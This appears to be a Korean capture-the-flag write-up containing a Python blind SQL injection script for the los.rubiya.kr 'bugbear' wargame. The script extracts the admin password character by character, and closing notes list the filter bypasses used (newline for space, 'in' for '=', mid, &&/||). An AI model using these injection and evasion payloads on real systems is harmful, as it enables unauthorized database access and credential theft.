import requests

pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'

space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'

length = 0

print("find length")
for i in range(1, 32):
    url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
        f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
    print(url)
    res = requests.get(url, cookies=cookie)
    if "Hello admin" in res.text:
        length = i
        print(i)
        break;

print("find password")
for i in range(1, length + 1):
    for j in range(32, 128):
        ch = chr(j).replace('"', '\\"')
        url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
            f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
        print(url)
        res = requests.get(url, cookies=cookie)
        if "Hello admin" in res.text:
            pw += chr(j)
            print(pw)
            break

ord 빼버리고 그냥 문자열이랑 비교하고

비교는 in 으로 하고,

스페이스바는 \n 개행으로 하고

and와 or은 &&와 ||로 쓴다.

728x90

'해킹 > writeup' 카테고리의 다른 글

webhacking.kr - 14, 15, 16, 17  (1) 2021.08.29
los.rubiya.kr - giant  (0) 2021.08.29
los.rubiya.kr - darkknight  (0) 2021.08.29
webhacking.kr - 52  (0) 2021.08.25
dreamhack.io - web-ssrf  (0) 2021.08.25

+ Recent posts